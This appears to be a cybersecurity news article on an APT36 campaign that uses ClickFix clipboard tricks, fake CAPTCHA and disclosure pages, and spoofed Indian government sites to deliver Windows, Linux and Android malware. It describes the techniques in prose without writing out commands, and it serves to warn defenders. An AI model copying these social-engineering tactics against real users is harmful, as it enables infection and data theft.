HQ/EMEAFind out how we can help your business
ClickFix malware has once again emerged as a tool of choice for cybercriminals, with a recent campaign spoofing Indian government websites to deliver malicious payloads across Windows, Linux, and Android platforms. Cybersecurity researchers have linked this activity to the Pakistan-aligned hacking group APT36, also known as Transparent Tribe, known for targeting Indian defence and public sector organisations.
The campaign began with the creation of fake websites that closely resembled legitimate Indian government portals, including those of the Ministry of Defence and India Post. Using ClickFix malware techniques, the attackers built clones of press release archives and official-looking pages that directed users to download or execute malicious files.
ClickFix malware was used in spoofed Indian government sites to deliver OS-specific payloads through deceptive interfaces, clipboard commands, and disguised downloads.
One such example was a domain imitating the Ministry of Defence, where a spoofed press release portal displayed links for monthly updates. While most links showed “No Data,” the only active one, labelled March 2025, triggered a sophisticated infection chain. Based on the user’s operating system, the site delivered a tailored payload.
For Linux users, the page posed as a CAPTCHA check, with a misspelt “I’m not a rebot” button. Clicking it silently copied a shell command to the user’s clipboard. When executed, this downloaded and ran a shell script from a compromised domain, although the script itself appeared non-malicious at the time of analysis.
Windows users, however, were greeted with a fake “For Official Use Only” warning page mimicking a government disclosure notice. Behind the scenes, a command using `mshta.exe` was copied to the clipboard, executing a heavily obfuscated HTA payload that connected to a known malicious IP address and launched a [.]NET-based malware loader. A cloned Ministry of Defence press release was shown to maintain the illusion of legitimacy.
The same tactics were also observed in another spoofed site, postindia\[.]site, which delivered different payloads based on device type. Windows visitors received a PDF embedded with PowerShell commands, while Android users were prompted to install an app disguised as a legitimate India Post service. The app harvested sensitive data and used deceptive icons to hide its presence.
Experts highlight that ClickFix malware is especially dangerous due to its use of clipboard manipulation and social engineering, which can trick even cautious users into self-infecting their systems. With repeated use of government branding, cloned sites, and cross-platform targeting, the campaign highlights the evolving threats facing public-sector cybersecurity.
Security professionals recommend heightened vigilance for clipboard-based scripts, spoofed domains, and deceptive site elements, warning that ClickFix malware tactics are likely to resurface in future attacks.
